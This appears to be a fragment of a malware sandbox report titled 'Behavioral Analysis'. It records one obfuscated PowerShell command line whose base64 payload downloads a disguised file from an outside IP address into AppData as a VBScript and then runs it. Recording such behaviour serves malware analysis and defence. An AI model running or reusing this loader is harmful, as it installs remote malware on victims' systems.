Behavioral Analysis

pOwersHElL.exe "C:\Windows\SyStem32\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe" "poWERsHEll.eXE -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT ; Iex($(iEx('[SYStem.TEXT.eNcODiNg]'+[CHar]58+[chAr]58+'UtF8.gEtstRINg([sYStEm.ConVErt]'+[char]58+[CHAr]58+'FrombAse64sTRinG('+[CHaR]34+'JFJ2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdQUkNUUUdZQmxFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbnpCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREN6QnZFTkl4eXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpemspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienRmalYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0a0RVUk0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRSdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC84ODgvc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm1lLnRJRiIsIiRlTlY6QVBQREFUQVxzZWViZXN0dGhpbmdzd2l0aGdyZWF0bmV3c2dpdmVubS52YlMiLDAsMCk7U3RhclQtU2xFRVAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm0udmJTIg=='+[chAR]0X22+'))')))"